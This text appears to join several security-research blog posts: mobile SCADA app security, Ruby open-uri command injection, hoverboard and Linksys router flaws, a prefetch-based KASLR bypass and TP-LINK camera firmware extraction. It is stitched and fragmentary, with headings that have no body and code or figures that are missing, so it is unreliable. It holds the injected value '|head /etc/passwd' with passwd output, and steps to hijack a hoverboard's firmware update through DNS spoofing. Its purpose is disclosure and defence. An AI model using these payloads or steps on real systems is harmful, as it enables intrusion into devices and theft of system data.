It has been a while since I published something about a really broken router. To be honest, it has been a while since I even looked at a router, but let me fix that with this blog post.


SCADA and Mobile Security in the IoT Era

Today, no one is surprised by the appearance of the IIoT. The idea of putting your logging, monitoring, and even supervisory/control functions in the cloud does not sound as crazy as it did several years ago. If you look at mobile application offerings today, many more ICS-related applications are available than two years ago. Previously, we predicted that the “rapidly growing mobile development environment” would redeem the past sins of SCADA systems.

The purpose of our research is to understand how the landscape has evolved and assess the security posture of SCADA systems and mobile applications in this new IIoT era.

SCADA and Mobile Applications



ICS infrastructures are heterogeneous by nature. They include several layers, each of which is dedicated to specific tasks. Figure 1 illustrates a typical ICS structure.

Mobile applications reside in several ICS segments and can be grouped into two general families: Local (control room) and Remote.

Local Applications

Local applications are installed on devices that connect directly to ICS devices in the field or process layers (over Wi-Fi, Bluetooth, or serial).

Remote Applications

Remote applications allow engineers to connect to ICS servers using remote channels, like the Internet, VPN-over-Internet, and private cell networks. Typically, they only allow monitoring of the industrial process; however, several applications allow the user to control/supervise the process. Applications of this type include remote SCADA clients, MES clients, and remote alert applications.

In comparison to local applications belonging to the control room group, which usually operate in an isolated environment, remote applications are often installed on smartphones that use Internet connections or even on personal devices in organizations that have a BYOD policy. In other words, remote applications are more exposed and face different threats.

Typical Threats And Attacks



- Unauthorized physical access to the device or “virtual” access to device data

- Communication channel compromise (MiTM)

- Application compromise

Table 1 summarizes the threat types.

- Perform analysis and fill out the test checklist

- Perform client and backend fuzzing

- If needed, perform deep analysis with reverse engineering

- Application purpose, type, category, and basic information

- Permissions

- Password protection

- Application intents, exported providers, broadcast services, etc.

- Native code

- Code obfuscation

- Presence of web-based components

- Methods of authentication used to communicate with the backend

- Correctness of operations with sessions, cookies, and tokens

- SSL/TLS connection configuration

- XML parser configuration

- Backend APIs

- Sensitive data handling

- HMI project data handling

- Secure storage

- Other issues



In our white paper, we provide an in-depth analysis of each category, along with examples of the most significant vulnerabilities we identified. Please download the white paper for a deeper analysis of each of the OWASP category findings.

Remediation And Best Practices

In addition to the well-known recommendations covering the OWASP Top 10 and OWASP Mobile Top 10 2016 risks, there are several actions that could be taken by developers of mobile SCADA clients to further protect their applications and systems.

In the following list, we gathered the most important items to consider when developing a mobile SCADA application:

- Always keep in mind that your application is a gateway to your ICS systems. This should influence all of your design decisions, including how you handle the inputs you will accept from the application and, more generally, anything that you will accept and send to your ICS system.

- Avoid all situations that could leave the SCADA operators in the dark or provide them with misleading information, from silent application crashes to full subversion of HMI projects.

- Follow best practices. Consider covering the OWASP Top 10, OWASP Mobile Top 10 2016, and the 24 Deadly Sins of Software Security.

- Do not forget to implement unit and functional tests for your application and the backend servers, to cover at a minimum the basic security features, such as authentication and authorization requirements.

- Enforce password/PIN validation to protect against threats U1-3. In addition, avoid storing any credentials on the device using unsafe mechanisms (such as in cleartext) and leverage robust and safe storing mechanisms already provided by the Android platform.

- Do not, under any circumstances, store sensitive data on SD cards or similar partitions without ACLs. Such storage media cannot protect your sensitive data.

- Provide secrecy and integrity for all HMI project data. This can be achieved by using authenticated encryption and storing the encryption credentials in the secure Android storage, or by deriving the key securely, via a key derivation function (KDF), from the application password.

- Encrypt all communication using strong protocols, such as TLS 1.2 with elliptic-curve key exchange and signatures and AEAD encryption schemes. Follow best practices, and keep updating your application as best practices evolve. Attacks always get better, and so should your application.

- Catch and handle exceptions carefully. If an error cannot be recovered, ensure the application notifies the user and quits gracefully. When logging exceptions, ensure no sensitive information is leaked to log files.

- If you are using Web Components in the application, think about preventing client-side injections (e.g., encrypt all communications, validate user input, etc.).

- Limit the permissions your application requires to the strict minimum.

- Implement obfuscation and anti-tampering protections in your application.
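The key-derivation recommendation in the list above can be illustrated with a short sketch. It uses Python's standard library rather than Android APIs, purely to show the shape of the operation. The function names, salt size, and iteration count are assumptions chosen for illustration, not values from our research.

```python
import hashlib
import os

# Assumed parameters for illustration only; tune them for the target hardware.
SALT_BYTES = 16
ITERATIONS = 200_000
KEY_BYTES = 32  # 256-bit key, the size an AEAD cipher such as AES-256-GCM expects


def new_salt() -> bytes:
    """Generate a random salt; it is not secret and can be stored with the ciphertext."""
    return os.urandom(SALT_BYTES)


def derive_project_key(password: str, salt: bytes) -> bytes:
    """Derive a key for protecting HMI project data from the application password."""
    return hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, ITERATIONS, dklen=KEY_BYTES
    )
```

The derived key would then be handed to an authenticated encryption scheme; that step is omitted here because it depends on the platform's cryptographic library.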

Conclusions

Two years have passed since our previous research, and things have continued to evolve. Unfortunately, they have not evolved with robust security in mind, and the landscape is less secure than ever before. In 2015, we found a total of 50 issues in the 20 applications we analyzed; in 2017, we found a staggering 147 issues in the 34 applications we selected. That is an average of 2.5 issues per application in 2015 versus roughly 4.3 in 2017, an increase of about 1.8 issues per application.

We therefore conclude that the growth of IoT in the era of “everything is connected” has not led to improved security for mobile SCADA applications. According to our results, more than 20% of the discovered issues allow attackers to directly misinform operators and/or directly/indirectly influence the industrial process.

In 2015, we wrote:

SCADA and ICS come to the mobile world recently, but bring old approaches and weaknesses. Hopefully, due to the rapidly developing nature of mobile software, all these problems will soon be gone.

We now concede that we were too optimistic and acknowledge that our previous statement was wrong.

Over the past few years, the number of incidents in SCADA systems has increased and the systems become more interesting for attackers every year. Furthermore, widespread implementation of the IoT/IIoT connects more and more mobile devices to ICS networks.

Thus, the industry should start to pay attention to the security posture of its SCADA mobile applications, before it is too late.

For the complete analysis, please download our white paper here.

Acknowledgments

Hidden Exploitable Behaviors in Programming Languages

Consider the following Ruby script named open-uri.rb:

|

require 'open-uri'

print open(ARGV[0]).read

|

The following command requests a web page:

|

# ruby open-uri.rb "https://ioactive.com"

|

And the following output is shown:

|

<!DOCTYPE HTML>

<!--[if lt IE 9]><html class="ie"><![endif]-->

<!--[if !IE]><!--><html><!--<![endif]--><head>

<meta charset="UTF-8">

<title>IOActive is the global leader in cybersecurity, penetration testing, and computer services</title>

[…SNIP…]

|

Works as expected, right? Still, this command may be used to open a process that allows any command to be executed. If a similar Ruby script is used in a web application with weak input validation then you could just add a pipe and your favorite OS command in a remote request:

|

"|head /etc/passwd"

|

And the following output could be shown:

|

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

[…SNIP…]

|

The difference between the two executions is just the pipe character at the beginning. The pipe character causes Ruby to stop using the function from open-uri, and use the native open() functionality that allows command execution[2].
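One way to close this hole is to validate the argument before it reaches any open()-style function. The sketch below is written in Python to keep the idea language-neutral. The function name is hypothetical, and it illustrates an allowlist approach under the assumption that only http and https URLs are legitimate input; it is not a fix shipped by any particular project.

```python
from urllib.parse import urlparse

# Assumption: the application only ever needs to fetch web pages.
ALLOWED_SCHEMES = {"http", "https"}


def is_safe_url(value: str) -> bool:
    """Return True only for absolute http(s) URLs that include a host."""
    candidate = value.strip()
    # A leading pipe is what switches Ruby's open() into command execution.
    if candidate.startswith("|"):
        return False
    parsed = urlparse(candidate)
    return parsed.scheme in ALLOWED_SCHEMES and bool(parsed.netloc)
```

In the Ruby script, an equivalent check would run on ARGV[0] before the call to open.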

Embedding Defense in Server-side Applications

- Enumerate a comprehensive list of current and new defensive techniques.

Multiple defensive techniques have been disclosed in books, papers and tools. This specification collects those techniques and presents new defensive options to fill the opportunity gap that remains open to attackers.

- Enumerate methods to identify attack tools before they can access functionalities.

The tools used by attackers identify themselves in several ways. Multiple features of a request can disclose that it is not from a normal user; a tool may abuse security flaws in ways that can help to detect the type of tool an attacker is using, and developers can prepare diversions and traps in advance that the specific tool would trigger automatically.

- Disclose how to detect attacker techniques within code.

Certain techniques can identify attacks within the code. Developers may know in advance that certain conditions will only be triggered by attackers, and they can also be prepared for certain unexpected scenarios.

- Provide a new defensive approach.

Server-side defense is normally about blocking malicious IP addresses associated with attackers; however, an attacker’s focus can be diverted or modified. Sometimes certain functionalities may be presented to attackers only to better prosecute them if those functionalities are triggered.

- Provide these protections for multiple programming languages.

This document will use pseudo code to explain functionalities that can reduce the effectiveness of attackers and expose their actions, and working proof-of-concept code will be released for four programming languages: Java, Python, .NET, and PHP.
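As a rough illustration of the trap idea described in the goals above, the sketch below flags requests that either announce a known attack tool in their User-Agent header or submit a decoy parameter that a normal user would never send. All names (the decoy field, the signature list, the function) are hypothetical and are not taken from the specification.

```python
# Hypothetical decoy: a hidden form field that a legitimate browser never fills in.
DECOY_FIELD = "debug_token"

# Illustrative substrings that some common tools put in their default User-Agent.
TOOL_SIGNATURES = ("sqlmap", "nikto", "nmap")


def classify_request(headers: dict, params: dict) -> str:
    """Return 'tool', 'trap', or 'normal' for a single request."""
    user_agent = headers.get("User-Agent", "").lower()
    if any(signature in user_agent for signature in TOOL_SIGNATURES):
        return "tool"
    # Automated tools tend to submit every field they discover, including decoys.
    if params.get(DECOY_FIELD):
        return "trap"
    return "normal"
```

What the application does with the classification (logging, diverting, or slowing the client down) is a separate design decision.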



Multiple Critical Vulnerabilities Found in Popular Motorized Hoverboards

Not that long ago, motorized hoverboards were in the news – according to widespread reports, they had a tendency to catch on fire and even explode. Hoverboards were so dangerous that the National Association of State Fire Marshals (NASFM) issued a statement recommending consumers “look for indications of acceptance by recognized testing organizations” when purchasing the devices. Consumers were even advised to not leave them unattended due to the risk of fires. The Federal Trade Commission has since established requirements that any hoverboard imported to the US meet baseline safety requirements set by Underwriters Laboratories.

Since hoverboards were a popular item used for personal transportation, I acquired a Ninebot by Segway miniPRO hoverboard in September of 2016 for recreational use. The technology is amazing and a lot of fun, making it very easy to learn and become a relatively skilled rider.

The hoverboard is also connected and comes with a rider application that enables the owner to do some cool things, such as change the light colors, remotely control the hoverboard, and see its battery life and remaining mileage. I was naturally a little intrigued and couldn’t help but start tinkering to see how fragile the firmware was. Given my experience as a security consultant and the well-chronicled issues of the past, it occurred to me that if vulnerabilities did exist, an attacker might exploit them to cause some serious harm.

When I started looking further, I learned that regulations now require hoverboards to meet certain mechanical and electrical specifications with the goal of preventing battery fires and various mechanical failures; however, there are currently no regulations aimed at ensuring firmware integrity and validation, even though firmware is also integral to the safety of the system.

Let’s Break a Hoverboard

Using reverse engineering and protocol analysis techniques, I was able to determine that my Ninebot by Segway miniPRO (Ninebot purchased Segway Inc. in 2015) had several critical vulnerabilities that were wirelessly exploitable. These vulnerabilities could be used by an attacker to bypass safety systems designed by Ninebot, one of the only hoverboards approved for sale in many countries.



Using protocol analysis, I determined I didn’t need to use a rider’s PIN (Personal Identification Number) to establish a connection. Even though the rider could set a PIN, the hoverboard did not actually change its default PIN of “000000.” This allowed me to connect over Bluetooth while bypassing the security controls. I could also document the communications between the app and the hoverboard, since they were not encrypted.

Additionally, after attempting to apply a corrupted firmware update, I noticed that the hoverboard did not implement any integrity checks on firmware images before applying them. This means an attacker could apply any arbitrary update to the hoverboard, which would allow them to bypass safety interlocks.

Upon further investigation of the Ninebot application, I also determined that connected riders in the area were indexed using their smartphones’ GPS; therefore, each rider’s location is published and publicly available, making actual weaponization of an exploit much easier for an attacker.

To show how this works, an attacker using the Ninebot application can locate other hoverboard riders in the vicinity:

Using the PIN “111111,” the attacker can then launch the Ninebot application and connect to the hoverboard. This would lock a normal user out of the Ninebot mobile application because a new PIN has been set.

Using DNS spoofing, an attacker can upload an arbitrary firmware image by spoofing the domain record for apptest.ninebot.cn. The mobile application downloads the image and then uploads it to the hoverboard:

"CtrlVersionCode":["1337","50212"]

Create a matching directory and file including the malicious firmware (/appversion/appdownload/NinebotMini/v1.3.3.7/Mini_Driver_v1.3.3.7.zip) with the modified update file Mini_Driver_V1.3.3.7.bin compressed inside of the firmware update archive.

When launched, the Ninebot application checks to see if the firmware version on the hoverboard matches the one downloaded from apptest.ninebot.cn. If there is a later version available (that is, if the version in the JSON object is newer than the version currently installed), the app triggers the firmware update process.
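The update decision described above can be sketched as follows. This is a guess at the logic, not decompiled application code: it assumes that the first element of CtrlVersionCode is the advertised controller firmware version and that versions compare as integers. The function name is hypothetical.

```python
import json


def update_available(manifest_json: str, installed_version: int) -> bool:
    """Return True if the manifest advertises a newer controller firmware."""
    manifest = json.loads(manifest_json)
    # Assumption: element 0 of CtrlVersionCode holds the advertised version code.
    advertised = int(manifest["CtrlVersionCode"][0])
    return advertised > installed_version
```

Because nothing in this flow authenticates the manifest, whoever controls the DNS answer for the update server also controls the outcome of the comparison.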

Analysis of Findings

Even though the Ninebot application prompted a user to enter a PIN when launched, it was not checked at the protocol level before allowing the user to connect. This left the Bluetooth interface exposed to an attack at a lower level. Additionally, since this device did not use standard Bluetooth PIN-based security, communications were not encrypted and could be wirelessly intercepted by an attacker.

Exposed management interfaces should not be available on a production device. An attacker may leverage an open management interface to execute privileged actions remotely. Due to the implementation in this scenario, I was able to leverage this vulnerability and perform a firmware update of the hoverboard’s control system without authentication.

Firmware integrity checks are imperative in embedded systems. Unverified or corrupted firmware images could permanently damage systems and may allow an attacker to cause unintended behavior. I was able to modify the controller firmware to remove rider detection, and may have been able to change configuration parameters in other onboard systems, such as the BMS (Battery Management System) and Bluetooth module.
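A minimal sketch of such a check follows, assuming the expected SHA-256 digest of each image reaches the device over an authenticated channel. The function name is hypothetical. A production design would verify an asymmetric signature over the image rather than a bare digest, since a digest fetched alongside the image can be replaced along with it.

```python
import hashlib
import hmac


def firmware_is_intact(image: bytes, expected_sha256_hex: str) -> bool:
    """Compare the image's SHA-256 digest with the expected value in constant time."""
    actual = hashlib.sha256(image).hexdigest()
    return hmac.compare_digest(actual, expected_sha256_hex.lower())
```

The update routine would refuse to flash any image for which this check returns False.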

Hoverboard and Android Application

As a result of the research, IOActive made the following security design and development recommendations to Ninebot that would correct these vulnerabilities:

- Implement firmware integrity checking.

- Use Bluetooth Pre-Shared Key authentication or PIN authentication.

- Use strong encryption for wireless communications between the application and hoverboard.

- Implement a “pairing mode” as the sole mode in which the hoverboard pairs over Bluetooth.

- Protect rider privacy by not exposing rider location within the Ninebot mobile application.

IOActive recommends that end users stay up-to-date with the latest versions of the app from Ninebot. We also recommend that consumers avoid hoverboard models with Bluetooth and wireless capabilities.

Responsible Disclosure

After completing the research, IOActive subsequently contacted and disclosed the details of the vulnerabilities identified to Ninebot. Through a series of exchanges since the initial contact, Ninebot has released a new version of the application and reported to IOActive that the critical issues have been addressed.

- December 2016: IOActive conducts testing on Ninebot by Segway miniPRO hoverboard.

- December 24, 2016: IOActive contacts Ninebot via a public email address to establish a line of communication.

- January 4, 2017: Ninebot responds to IOActive.

- January 27, 2017: IOActive discloses issues to Ninebot.

- April 2017: Ninebot releases an updated application (3.20), which includes fixes that address some of IOActive’s findings.

- April 17, 2017: Ninebot informs IOActive that remediation of critical issues is complete.

- July 19, 2017: IOActive publishes findings.

Linksys Smart Wi-Fi Vulnerabilities

By Tao Sauvage

Last year I acquired a Linksys Smart Wi-Fi router, more specifically the EA3500 Series. I chose Linksys (previously owned by Cisco and currently owned by Belkin) due to its popularity and I thought that it would be interesting to have a look at a router heavily marketed outside of Asia, hoping to have different results than with my previous research on the BHU Wi-Fi uRouter, which is only distributed in China.

Smart Wi-Fi is the latest family of Linksys routers and includes more than 20 different models that use the latest 802.11n and 802.11ac standards. Even though they can be remotely managed from the Internet using the free Linksys Smart Wi-Fi service, we focused our research on the router itself.

My friend @xarkes_, a security aficionado, and I decided to analyze the firmware (i.e., the software installed on the router) in order to assess the security of the device. The technical details of our research will be published soon after Linksys releases a patch that addresses the issues we discovered, to ensure that all users with affected devices have enough time to upgrade.

In the meantime, we are providing an overview of our results, as well as key metrics to evaluate the overall impact of the vulnerabilities identified.

Security Vulnerabilities

After reverse engineering the router firmware, we identified a total of 10 security vulnerabilities, ranging from low- to high-risk issues, six of which can be exploited remotely by unauthenticated attackers.

Two of the security issues we identified allow unauthenticated attackers to create a Denial-of-Service (DoS) condition on the router. By sending a few requests or abusing a specific API, an attacker can make the router unresponsive or even force it to reboot. The Admin is then unable to access the web admin interface and users are unable to connect until the attacker stops the DoS attack.

Attackers can also bypass the authentication protecting the CGI scripts to collect technical and sensitive information about the router, such as the firmware version and Linux kernel version, the list of running processes, the list of connected USB devices, or the WPS PIN for the Wi-Fi connection. Unauthenticated attackers can also harvest sensitive information, for instance using a set of APIs to list all connected devices and their respective operating systems, access the firewall configuration, read the FTP configuration settings, or extract the SMB server settings.

Finally, authenticated attackers can inject and execute commands on the operating system of the router with root privileges. One possible action for the attacker is to create backdoor accounts and gain persistent access to the router. Backdoor accounts would not be shown on the web admin interface and could not be removed using the Admin account. It should be noted that we did not find a way to bypass the authentication protecting the vulnerable API; this authentication is different from the authentication protecting the CGI scripts.

Linksys has provided a list of all affected models:

- EA2700

- EA2750

- EA3500

- EA4500v3

- EA6100

- EA6200

- EA6300

- EA6350v2

- EA6350v3

- EA6400

- EA6500

- EA6700

- EA6900

- EA7300

- EA7400

- EA7500

- EA8300

- EA8500

- EA9200

- EA9400

- EA9500

- WRT1200AC

- WRT1900AC

- WRT1900ACS

- WRT3200ACM

Cooperative Disclosure

We disclosed the vulnerabilities and shared the technical details with Linksys in January 2017. Since then, we have been in constant communication with the vendor to validate the issues, evaluate the impact, and synchronize our respective disclosures.

We would like to emphasize that Linksys has been exemplary in handling the disclosure and we are happy to say they are taking security very seriously.

We acknowledge the challenge of reaching out to the end-users with security fixes when dealing with embedded devices. This is why Linksys is proactively publishing a security advisory to provide temporary solutions to prevent attackers from exploiting the security vulnerabilities we identified, until a new firmware version is available for all affected models.

Metrics and Impact



As of now, we can already safely evaluate the impact of such vulnerabilities on Linksys Smart Wi-Fi routers. We used Shodan to identify vulnerable devices currently exposed on the Internet.

We found about 7,000 vulnerable devices exposed at the time of the search. It should be noted that this number does not take into account vulnerable devices protected by strict firewall rules or running behind another network appliance, which could still be compromised by attackers who have access to the individual or company’s internal network.

A vast majority of the vulnerable devices (~69%) are located in the USA, and the remainder are spread across the world, including Canada (~10%), Hong Kong (~1.8%), Chile (~1.5%), and the Netherlands (~1.4%). Venezuela, Argentina, Russia, Sweden, Norway, China, India, the UK, Australia, and many other countries account for less than 1% each.

We performed a mass-scan of the ~7,000 devices to identify the affected models. In addition, we tweaked our scan to find how many devices would be vulnerable to the OS command injection that requires the attacker to be authenticated. We leveraged a router API to determine if the router was using default credentials without having to actually authenticate.

We found that 11% of the ~7,000 exposed devices were using default credentials and therefore could be rooted by attackers.

Recommendations

We advise Linksys Smart Wi-Fi users to carefully read the security advisory published by Linksys to protect themselves until a new firmware version is available. We also recommend users change the default password of the Admin account to protect the web admin interface.

Timeline Overview

- January 17, 2017: IOActive sends a vulnerability report to Linksys with findings

- January 17, 2017: Linksys acknowledges receipt of the information

- January 19, 2017: IOActive communicates its obligation to publicly disclose the issue within three months of reporting the vulnerabilities to Linksys, for the security of users

- January 23, 2017: Linksys acknowledges IOActive’s intent to publish and timeline; requests notification prior to public disclosure

- March 22, 2017: Linksys proposes release of a customer advisory with recommendations for protection

- March 23, 2017: IOActive agrees to Linksys proposal

- March 24, 2017: Linksys confirms the list of vulnerable routers

- April 20, 2017: Linksys releases an advisory with recommendations and IOActive publishes findings in a public blog post

Harmful prefetch on Intel









We’ve seen a lot of articles and presentations that show how the prefetch instruction can be used to bypass modern OS kernel implementations of ASLR. Most of the public work however only focuses on getting base addresses of modules with the idea of building a ROP chain or maybe patching some pointer/value of the data section. This post represents an extension of previous work, as it documents the usage of prefetch to discover PTEs on Windows 10.

You can find the code I used, and run the tests on your own processor, at https://github.com/IOActive/I-know-where-your-page-lives/blob/master/prefetch/PrefetchASLRBypass.cpp

I had the opportunity to give the talk, “I Know Where your Page Lives” late last year, first at ekoparty, and then at ZeroNights. The idea is simple enough: use TSX as a side channel to measure the difference in time between a mapped page and an unmapped page with the final goal of determining where the PML4-Self-Ref entry is located. You can find not only the slides but also the code that performs the address leaking and an exploit for CVE-2016-7255 as a demonstration of the technique at https://github.com/IOActive/I-know-where-your-page-lives.

After the presentation, different people approached and asked me about prefetch and BTB, and its potential usage to do the same thing. The truth is at the time, I was really skeptical about prefetch because my understanding was the only actual attack was the one named “Cache Probing” (/wp-content/uploads/2017/01/4977a191.pdf).

Indeed, I need to thank my friend Rohit Mothe (@rohitwas) because he made me realize I completely overlooked Anders Fogh’s and Daniel Gruss’ presentation: /wp-content/uploads/2017/01/us-16-Fogh-Using-Undocumented-CPU-Behaviour-To-See-Into-Kernel-Mode-And-Break-KASLR-In-The-Process.pdf.

So in this post I’m going to cover prefetch and say a few words about BTB. Let’s get into it:

Leaking with prefetch

For TSX, the routine that returned different values depending on whether the page was mapped or not was:

And with just that, you’re now able to see differences between pages on Intel processors. Following are the measurements for every potential PML4-Self-Ref:

From the above output, we can distinguish three different groups:

The 2nd group stands for pages that don’t have PTEs but do have a PDE, PDPTE, or PML4E. Given that we know this will be the largest group of the three, we could take the average of the whole sample as a reference to know if a page doesn’t have a PTE. In this case, the value is 40.89024529.

Now, to establish a threshold for further checks, I used the following simple formula:

DIFFERENCE_THRESHOLD = abs(get_array_average()-Mapped_time)/2 - 1;

Where get_array_average() returns 40.89024529, as stated before, and Mapped_time is the lowest value in the whole group: 31.44232.

From this point, we can process each virtual address whose value is close to Mapped_time, based on the threshold. As in the case of TSX, the procedure consists of treating each potential index as the real one and testing several PTEs of previously allocated pages.

Finally, to discard the dummy entries, we test for the PTE of a known UNMAPPED REGION. For this I’m calculating the PTE of the address 0x180c06000000 (0x30 for every index), which normally is always unmapped for our process.

Results on Intel Skylake i7 6700HQ:

In both cases, this worked perfectly… Of course it doesn’t make sense to use this technique in Windows versions before 10 or Server 2016 but I did it to show the result matches the known self-ref entry.
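As a sanity check on the threshold formula given earlier, the calculation can be reproduced with the quoted numbers. The sketch below is a Python restatement, not the C++ code from the repository. The helper names are hypothetical, and the candidate test is my reading of "close to the Mapped_time based on the threshold".

```python
def difference_threshold(array_average: float, mapped_time: float) -> float:
    """DIFFERENCE_THRESHOLD = abs(average - Mapped_time) / 2 - 1."""
    return abs(array_average - mapped_time) / 2 - 1


def is_candidate(measured: float, mapped_time: float, threshold: float) -> bool:
    """Assumed rule: keep an address if its timing is within the threshold of Mapped_time."""
    return abs(measured - mapped_time) <= threshold


threshold = difference_threshold(40.89024529, 31.44232)
print(round(threshold, 4))  # 3.724
```

With these values, a measurement near 31 cycles is kept for further PTE checks, while one near the sample average of about 41 cycles is discarded.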

Now, what is weird is that I also tested on another EC2 instance from Amazon, this time with an Intel Xeon E5-2676 v3, and it didn’t work at all:

The algorithm failed because it wasn’t able to distinguish between mapped and unmapped pages: all the values that were retrieved with prefetch are almost equal.

This same thing happened with the tests I was able to perform on AMD:

At this point it is clear that prefetch makes it possible to determine PTEs and can be used just as well as TSX to get the PML4-Self-Ref entry. One of the advantages of prefetch is that it is present in older generations of Intel processors, making the attack possible on more platforms. A second advantage is speed: while a TSX transaction takes ~200 cycles, the prefetch takes just ~40. Nevertheless, in my opinion, the attack using TSX is far more reliable, given that we know there is an almost fixed difference of ~40 cycles between mapped and unmapped pages, so the confidence in the results is higher.

Before actually using this, however, one must ensure that leaking with prefetch actually works on the target. As we showed before, some Intel processors, such as the Xeon E5-2676, appear to be unaffected.

Last but not least, it seems AMD is still the winner in terms of not having any side-effect issues with its instructions. So for now, you’d rather run Windows 10 on AMD 🙂

Regarding BTB, the truth is there is no code in the paging structure region, meaning there won’t be any kind of JMP instruction to this region that could be exercised and measured. This doesn’t mean there is no way to determine whether a page is mapped using this method, but it does mean it’s not as direct as in the prefetch or TSX cases (more research is required).

As always, we would love to hear from other security types who might have a differing opinion. All of our positions are subject to change through exposure to compelling arguments and/or data.















Inside the IOActive Silicon Lab: Interpreting Images

Optical Microscopy

Depth of field

Color

- Material color

- Orientation of the surface relative to incident light

- Thickness of the glass/transparent material over it

Electron Microscopy

Secondary Electron Images

Backscattered Electron Images

Got 15 minutes to kill? Why not root your Christmas gift?

TP-LINK NC200 and NC220 Cloud IP Cameras, which promise to let consumers “see there, when you can’t be there,” are vulnerable to an OS command injection in the PPPoE username and password settings. An attacker can leverage this weakness to get a remote shell with root privileges.

The cameras are being marketed for surveillance, baby monitoring, pet monitoring, and monitoring of seniors.

This blog post provides a 101 introduction to embedded hacking and covers how to extract and analyze firmware to look for common low-hanging fruit in security. This post also uses binary diffing to analyze how TP-LINK recently fixed the vulnerability with a patch.

One week before Christmas

While at a nearby electronics shop looking to buy some gifts, I stumbled upon the TP-LINK Cloud IP Camera NC200 available for €30 (about $33 US), which fit my budget. “Here you go, you found your gift right there!” I thought. But as usual, I could not resist the temptation to open it before Christmas. Of course, I did not buy the camera as a gift after all; I only bought it hoping that I could root the device.

Figure 1: NC200 (Source: http://www.tp-link.com)



Clicking Download opened a download window where I could save the firmware locally (version NC200_V1_151222 according to http://www.tp-link.com/en/download/NC200.html#Firmware). I thought the device would download and install the update directly, but thank you, TP-LINK, for making it easy for us by saving it instead.

Recon 101

Let’s start an imaginary timer of 15 minutes, shall we? Ready? Go!

The easiest way to check what is inside the firmware is to examine it with the awesome tool that is binwalk (http://binwalk.org), which searches a binary image for embedded files and executable code.

binwalk yields this output:

|

depierre% binwalk nc200_2.1.4_Build_151222_Rel.24992.bin

DECIMAL HEXADECIMAL DESCRIPTION

——————————————————————————–

192 0xC0 uImage header, header size: 64 bytes, header CRC: 0x95FCEC7, created: 2015-12-22 02:38:50, image size: 1853852 bytes, Data Address: 0x80000000, Entry Point: 0x8000C310, data CRC: 0xABBB1FB6, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: “Linux Kernel Image”

256 0x100 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 4790980 bytes

1854108 0x1C4A9C JFFS2 filesystem, little endian

|

In the output above, binwalk tells us that the firmware contains, among other things, a JFFS2 filesystem. The firmware’s filesystem holds the binaries used by the device. On Linux, it commonly embeds the usual directory hierarchy (/bin, /lib, /etc) with the corresponding binaries and configuration files (an RTOS would look different). In our case, since the camera has a web interface, the JFFS2 partition should contain the camera’s CGI (Common Gateway Interface) binary.
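To make the idea behind that output concrete, here is a minimal sketch of signature scanning in Python. It is not how binwalk is implemented (binwalk validates far more than a magic number); it only searches a blob for the magic bytes of the three formats reported above. The helper names `find_all` and `scan` are made up for this illustration, and the three-byte LZMA pattern is a simplifying assumption based on the 0x5D properties byte shown in the output.

```python
import struct

# Magic values for the three formats binwalk reported above.
UIMAGE_MAGIC = struct.pack(">I", 0x27051956)  # uImage header magic, big-endian
JFFS2_MAGIC_LE = struct.pack("<H", 0x1985)    # JFFS2 node magic, little-endian
LZMA_PROPS = b"\x5d\x00\x00"                  # 0x5D properties byte + low dictionary-size bytes (assumption)


def find_all(blob, needle):
    """Return every offset at which needle occurs in blob."""
    offsets = []
    start = blob.find(needle)
    while start != -1:
        offsets.append(start)
        start = blob.find(needle, start + 1)
    return offsets


def scan(blob):
    """Naive signature scan: map each format name to the offsets of its magic bytes."""
    return {
        "uImage": find_all(blob, UIMAGE_MAGIC),
        "LZMA": find_all(blob, LZMA_PROPS),
        "JFFS2": find_all(blob, JFFS2_MAGIC_LE),
    }


if __name__ == "__main__":
    # Hypothetical usage: pass the path of a firmware image you are allowed to analyze.
    import sys
    with open(sys.argv[1], "rb") as fh:
        for name, offsets in scan(fh.read()).items():
            print(name, [hex(o) for o in offsets[:5]])
```

On a real image, a scan this naive reports many false positives (two-byte magics occur by chance), which is one reason to rely on binwalk itself for actual work.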

It appears that the firmware is not encrypted or obfuscated; otherwise binwalk would have failed to recognize the elements of the firmware. We can test this assumption by asking binwalk to extract the firmware to our disk. We will use the -re options. The option -e tells binwalk to extract all known types it recognized, while the option -r removes any empty files after extraction (which could be created if extraction was not successful, for instance due to a mismatched signature). This generates the following output:

|

depierre% binwalk -re nc200_2.1.4_Build_151222_Rel.24992.bin

DECIMAL HEXADECIMAL DESCRIPTION

——————————————————————————–

192 0xC0 uImage header, header size: 64 bytes, header CRC: 0x95FCEC7, created: 2015-12-22 02:38:50, image size: 1853852 bytes, Data Address: 0x80000000, Entry Point: 0x8000C310, data CRC: 0xABBB1FB6, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: “Linux Kernel Image”

256 0x100 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 4790980 bytes

1854108 0x1C4A9C JFFS2 filesystem, little endian

|

Since no error was thrown, we should have our JFFS2 filesystem on our disk:

|

depierre% ls -l _nc200_2.1.4_Build_151222_Rel.24992.bin.extracted

total 21064

-rw-r--r-- 1 depierre staff 4790980 Feb 8 19:01 100

-rw-r--r-- 1 depierre staff 5989604 Feb 8 19:01 100.7z

drwxr-xr-x 3 depierre staff 102 Feb 8 19:01 jffs2-root/

depierre% ls -l _nc200_2.1.4_Build_151222_Rel.24992.bin.extracted/jffs2-root/fs_1

total 0

drwxr-xr-x 9 depierre staff 306 Feb 8 19:01 bin/

drwxr-xr-x 11 depierre staff 374 Feb 8 19:01 config/

drwxr-xr-x 7 depierre staff 238 Feb 8 19:01 etc/

drwxr-xr-x 20 depierre staff 680 Feb 8 19:01 lib/

drwxr-xr-x 22 depierre staff 748 Feb 10 11:58 sbin/

drwxr-xr-x 2 depierre staff 68 Feb 8 19:01 share/

drwxr-xr-x 14 depierre staff 476 Feb 8 19:01 www/

|

We see a list of the filesystem’s top-level directories. Perfect!

Now we are looking for the CGI, the binary that handles web interface requests generated by the Administrator. We search each of the seven directories for something interesting, and find what we are looking for in /config/conf.d. In the directory, we find configuration files for lighttpd, so we know that the device is using lighttpd, an open-source web server, to serve the web administration interface.

Let’s check its fastcgi.conf configuration:

|

depierre% pwd

/nc200/_nc200_2.1.4_Build_151222_Rel.24992.bin.extracted/jffs2-root/fs_1/config/conf.d

depierre% cat fastcgi.conf

# [omitted]

